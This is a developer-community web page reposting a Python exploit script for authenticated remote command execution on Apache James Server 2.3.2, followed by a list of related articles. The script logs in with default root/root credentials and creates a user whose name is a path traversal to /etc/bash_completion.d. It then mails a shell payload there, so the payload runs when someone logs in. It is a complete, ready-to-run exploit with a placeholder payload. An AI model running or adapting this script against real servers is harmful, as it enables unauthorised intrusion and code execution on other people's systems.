AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Apache James Server 2.3.2 - Remote Command Execution

2015-01-26 1375
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: #!/usr/bin/python## Exploit Title: Apache James Server 2. 
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
 
import socket
import sys
import time
 
# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
 
if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)
 
ip = sys.argv[1]
 
def recv(s):
        s.recv(1024)
        time.sleep(0.2)
 
try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()
 
    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

文章标签:
Apache
Python
移动开发
Ubuntu
关键词:
Apache server
Apache remote execution
Apache command
Apache james
cnbird
目录
相关文章
xleesf
|
6月前
|
缓存 分布式计算 API
Apache Hudi Timeline Server介绍
Apache Hudi Timeline Server介绍
xleesf
73 2
张家锋
|
SQL Unix 数据库连接
Apache Doris 通过ODBC连接SQL Server
以下是Apache Doris 通过ODBC连接SQL Server。
张家锋
550 0
Apache Doris 通过ODBC连接SQL Server
kng32f3vbngrm
|
6月前
|
分布式计算 安全 Hadoop
HBase Shell-org.apache.hadoop.hbase.ipc.ServerNotRunningYetException: Server is not running yet 已解决
在HBase Shell遇到错误时,检查Hadoop非安全模式:`hdfs dfsadmin -safemode get`。问题解决在于`hbase-site.xml`中添加配置:Zookeeper客户端端口设为2181和预写日志提供者设为filesystem。
kng32f3vbngrm
151 6
极客李华
|
6月前
|
Oracle Java 关系型数据库
淇℃伅 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.鏈嶅姟鍣ㄧ増鏈�: Apache Tomcat/8.5.
淇℃伅 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.鏈嶅姟鍣ㄧ増鏈�: Apache Tomcat/8.5.
极客李华
111 1
卡尔特斯
|
Apache Windows
(MAC) Apache You don't have permission to access / on this server.
(MAC) Apache You don't have permission to access / on this server.
卡尔特斯
101 0
李金泽
|
人工智能 安全 大数据
HBase启动报错:ERROR: org.apache.hadoop.hbase.ipc.ServerNotRunningYetException: Server is not running yet
欢迎关注大数据和人工智能技术文章发布的微信公众号:清研学堂,在这里你可以学到夜白(作者笔名)精心整理的笔记,让我们每天进步一点点,让优秀成为一种习惯! 今天进入hbase shell中输入命令报错:ERROR: org.
李金泽
6127 0
游客du62snpusmjeg
|
供应链 安全 IDE
Apache HTTP Server 拒绝服务漏洞(CVE-2022-29404)
Apache HTTP Server 拒绝服务漏洞(CVE-2022-29404)
游客du62snpusmjeg
393 0
Apache HTTP Server 拒绝服务漏洞(CVE-2022-29404)
红目香薰
|
Apache PHP Windows
PHP面试题:windows平台, Apache Http Server启动失败, 排错思路是什么?
PHP面试题:windows平台, Apache Http Server启动失败, 排错思路是什么?
红目香薰
141 0
码途
|
Apache Windows
外网访问内网Apache HTTP Server
本地安装了一个Apache HTTP Server,只能在局域网内访问,怎样从外网也能访问到本地的Apache HTTP Server呢?本文将介绍具体的实现步骤。 1. 准备工作 1.1 安装并启动Apache HTTP Server 默认安装的Apache HTTP Server端口是80。
码途
1732 0
技术小阿哥
|
Apache 网络协议
Apache 502 The proxy server 解决办法
技术小阿哥
5255 0

热门文章

最新文章

  • 1
    Apache Flink 进阶(三):Checkpoint 原理解析与应用实践
  • 2
    知乎基于 Apache Doris 的 DMP 平台架构建设实践|万字长文详解
  • 3
    RHEL 5不能安装Apache
  • 4
    AB(apache benchmark)压力测试
  • 5
    Apache Kafka开发入门指南
  • 6
    如何设置Apache中的最大连接数
  • 7
    Julien Nioche谈Apache Nutch 2的特性及产品路线图
  • 8
    Apache Dubbo 被曝出“高危”远程代码执行漏洞
  • 9
    从零开始玩转JMX(四)——Apache Commons Modeler &amp; Dynamic MBean
  • 10
    RedHatAS4下Apache2+MySQL+Php+Tomcat整合及虚拟主机配置
  • 1
    Apache Flink官方网站提供了关于如何使用Docker进行Flink CDC测试的文档
    718
  • 2
    Apache Hadoop YARN基本架构
    87
  • 3
    Apache工作模式详解
    103
  • 4
    Spring Boot集成Redis启动失败【Caused by: java.lang.ClassNotFoundException: org.apache.commons.pool2.impl.G】
    378
  • 5
    【问题解决】nested exception is org.apache.ibatis.exceptions.TooManyResultException:Expected one result
    316
  • 6
    性能工具之 Apache Bench 入门使用
    109
  • 7
    Linux Apache服务详解——Apache虚拟目录与禁止显示目录列表实战
    95
  • 8
    Apache Flink自定义 logback xml配置
    344
  • 9
    使用Amazon EMR和Apache Hudi在S3上插入,更新,删除数据
    220
  • 10
    一文了解Apache Hudi架构、工具和最佳实践
    1078

    • 相关课程

    更多
  • Apache RocketMQ:如何从互联网时代演进到云
  • Apache Flink 入门到实战 - Flink开源社区出品
  • Apache Flink 入门

    • 相关电子书

    更多
  • Apache Flink技术进阶
  • Apache Spark: Cloud and On-Prem
  • Hybrid Cloud and Apache Spark

    • 推荐镜像

    更多
  • apache
  • packman
  • CPAN
    • 下一篇
    无影云桌面